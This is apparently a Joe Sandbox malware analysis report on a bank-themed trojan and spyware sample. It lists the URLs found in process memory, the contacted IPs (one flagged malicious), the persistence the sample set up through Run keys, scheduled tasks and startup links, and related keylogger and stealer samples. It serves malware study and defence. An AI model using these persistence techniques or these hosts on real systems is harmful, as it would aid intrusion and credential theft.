http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.i.lencr.org/0	XClient.exe, 00000008.00000002.2936268568.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2927137244.000000001B830000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21ResponseD	build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	XClient.exe, 00000008.00000002.2652391836.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10ResponseD	build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15ResponseD	build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/D	build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	XClient.exe, 00000008.00000002.2931905344.000000001C6CB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2936268568.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	XClient.exe, 00000008.00000002.2931905344.000000001C6CB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2936268568.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12ResponseD	build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0	powershell.exe, 00000015.00000002.2438212189.000001E8C44BC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id7ResponseD	build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	XClient.exe, 00000008.00000002.2692349903.000000001482B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001480F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001319F000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014578000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FF1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AA7000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142E1000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000003532000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015288000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014AC3000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015520000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000142FD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.000000001526D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015506000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.00000000131BA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014FD5000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014594000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000342B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D3E000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000014D5A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2645035144.0000000004036000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4ResponseD	build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2002/12/policy	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id22Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id22ResponseD	build.exe, 00000009.00000002.2623500553.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id16ResponseD	build.exe, 00000009.00000002.2623500553.0000000002C63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19ResponseD	build.exe, 00000009.00000002.2623500553.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id18Response	XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd	XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	false
212.162.149.53	unknown	Netherlands	64236	UNREAL-SERVERSUS	true
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562900
Start date and time:	2024-11-26 09:00:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@30/29@4/5
EGA Information:	Successful, ratio: 44.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 116 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target XClient.exe, PID 1412 because it is empty
Execution Graph export aborted for target XClient.exe, PID 7424 because it is empty
Execution Graph export aborted for target YkxAHNcqEmoeLS.exe, PID 5852 because it is empty
Execution Graph export aborted for target Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe, PID 1436 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7216 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:01:09	API Interceptor	1x Sleep call for process: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe modified
03:01:11	API Interceptor	43x Sleep call for process: powershell.exe modified
03:01:14	API Interceptor	1x Sleep call for process: YkxAHNcqEmoeLS.exe modified
03:01:16	API Interceptor	57x Sleep call for process: XClient.exe modified
03:01:43	API Interceptor	104x Sleep call for process: build.exe modified
03:01:49	API Interceptor	1x Sleep call for process: WerFault.exe modified
03:02:30	API Interceptor	7601365x Sleep call for process: apihost.exe modified
09:01:12	Task Scheduler	Run new task: YkxAHNcqEmoeLS path: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe
09:01:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
09:01:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
09:01:32	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
09:01:36	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
09:01:44	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
193.122.6.168	Halkbank_Ekstre_25112024 _073809_405251.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rrequestforquotation.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s82.gocheapweb.com	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	neworigin.exe	Get hash	malicious	AgentTesla	Browse	51.195.88.199
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
api.ipify.org	INVITATION TO BID as on 25 NOV 2024.html	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	104.26.13.205
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	104.26.13.205
	Packing List - SAPPHIRE X.xlsx.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	WOOYANG VENUS PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=true	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.13.205
	Orden de compra HO-PO-376-25.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	RICHIESTA D'OFFERTA.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.12.205
	DJ5PhUwOsM.exe	Get hash	malicious	AgentTesla, XWorm	Browse	104.26.13.205
	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse	104.26.13.205
reallyfreegeoip.org	Halkbank_Ekstre_25112024 _073809_405251.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	INV-0542.pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	jbuESggTv0.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	tJzfnaqOxj.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	LAQfpnQvPQ.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	F7Xu8bRnXT.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
